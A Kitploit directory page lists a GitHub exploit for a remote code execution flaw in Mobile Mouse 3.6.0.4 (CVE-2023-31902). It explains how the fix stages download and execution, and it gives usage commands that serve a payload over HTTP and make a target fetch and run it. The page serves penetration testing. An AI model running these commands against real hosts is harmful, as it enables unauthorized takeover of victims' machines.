Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
mouseserver-exploit — Mobile Mouse 3.6.0.4 - Remote Code Execution - CVE-2023-31902 | Kitploit
Tools/GitHubGitHub/lypd0/mouseserver-exploit
Vulnerability AnalysisExploitationPenetration TestingRed Teaming
GitHublypd0/mouseserver-exploit

mouseserver-exploit

Mobile Mouse 3.6.0.4 - Remote Code Execution - CVE-2023-31902

View Repository
117 days agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Mobile Mouse 3.6.0.4 RCE - Fix

A corrected version of the Mobile Mouse 3.6.0.4 remote code execution exploit published as EDB-51010.

Vulnerability

  • CVE: CVE-2023-31902
  • Affected version: Mobile Mouse 3.6.0.4
  • Default port: TCP/9099

What Was Fixed

The original exploit successfully downloads the payload but may fail to execute it because both stages use the same TCP connection.

This version:

  • Downloads the payload through the first session
  • Waits for the download to complete
  • Opens a fresh connection
  • Repeats the Mobile Mouse handshake
  • Executes the downloaded payload

It also uses sendall(), properly escaped Windows paths, socket timeouts, and basic error handling.

Usage

Start an HTTP server in the payload directory:

root@kitploit:~
python3 -m http.server 8080

Run the exploit:

root@kitploit:~
python3 exploit.py \
  --target 192.168.1.50 \
  --lhost 192.168.1.10 \
  --file payload.exe

Disclaimer

This project is intended only for authorized security testing and educational research. Do not use it against systems without explicit permission.

Download Tool